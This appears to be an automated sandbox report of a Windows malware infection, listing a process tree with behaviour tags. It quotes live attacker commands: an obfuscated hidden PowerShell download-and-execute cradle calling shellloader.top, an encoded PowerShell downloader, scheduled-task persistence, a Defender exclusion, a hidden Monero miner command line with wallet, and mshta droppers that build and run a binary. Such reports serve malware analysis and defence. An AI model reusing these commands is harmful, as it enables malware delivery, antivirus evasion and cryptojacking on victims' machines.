                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:6712
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:5092
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c Wed154a69e494d5e99ca.exe
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:432
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Wed15566afaea59e.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:3676
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15566afaea59e.exe
                                                                                                                                                                      Wed15566afaea59e.exe
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:3056
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Wed15edb855a49.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2344
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15edb855a49.exe
                                                                                                                                                                        Wed15edb855a49.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:4840
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed150b6a68b74a9.exe
                                                                                                                                                                  Wed150b6a68b74a9.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:1588
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed154a69e494d5e99ca.exe
                                                                                                                                                                  Wed154a69e494d5e99ca.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:1576
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:3812
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4392
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:6756
                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:5900
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:5112
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                              PID:4076
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5972
                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:2396
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:4324
                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:5504
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:296
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 336
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:4880
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 484
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:5924
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 528
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:5572
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 480
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:2912
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 528
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:692
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 752
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:6568
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                    "installer.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:6748
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-T7K0L.tmp\installer.tmp
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-T7K0L.tmp\installer.tmp" /SL5="$30436,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      PID:6860
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Install.EXE
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Install.EXE"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                  PID:3552
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:4944
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:5892
                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:3080
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      PID:4336
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zSE9F4.tmp\Install.cmd" "
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                        PID:6956
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\inst3.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\inst3.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:2116
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                    PID:4852
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im Firstoffer.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:644
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /im Firstoffer.exe /f
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          PID:6700
                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                          timeout /t 6
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                          PID:4072
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:516
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3154097.scr
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3154097.scr" /S
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4172
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3241671.scr
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3241671.scr" /S
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                        PID:2588
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7159421.scr
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7159421.scr" /S
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        PID:6888
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1864292.scr
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\1864292.scr" /S
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:7116
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4888
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-KTJR3.tmp\setup_2.tmp
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-KTJR3.tmp\setup_2.tmp" /SL5="$10340,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:5148
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5536
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-TJT5P.tmp\setup_2.tmp
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-TJT5P.tmp\setup_2.tmp" /SL5="$503BA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                            PID:5712
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-L24S0.tmp\postback.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-L24S0.tmp\postback.exe" ss1
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:1536
                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                  explorer.exe ss1
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                  PID:4840
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:6492
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                        PID:4488
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\JoVi6aWZg.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\JoVi6aWZg.exe"
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:6200
                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                          cmd /c "helimlim.bat"
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:6304
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              PID:5676
                                                                                                                                                                                                              • C:\Windows\system32\wscript.exe
                                                                                                                                                                                                                "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs
                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                  PID:5692
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                PID:4012
                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                  PID:5232
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:5752
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
                                                                                                                                                                                                        ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                        PID:4500
                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                          PID:5864
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:3244
                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run ("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0 , trUE ) )
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:6840
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:5432
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                      PID:6096
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                        PID:5900
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                        control ..\kZ_AmsXL.6G
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                          PID:2232
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            PID:6208
                                                                                                                                                                                                                            • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                                              C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:6960
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  PID:6052
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill -f /Im "sfx_123_206.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:4792
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                PID:1316
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:7080
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill /im "setup.exe" /f
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:2908
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:3848
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:5372
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\pli-game.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\pli-game.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:5248
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:5884
                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                              PID:5832
                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                              PID:6504
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                PID:6728
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                              PID:7992
                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                              PID:8096
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
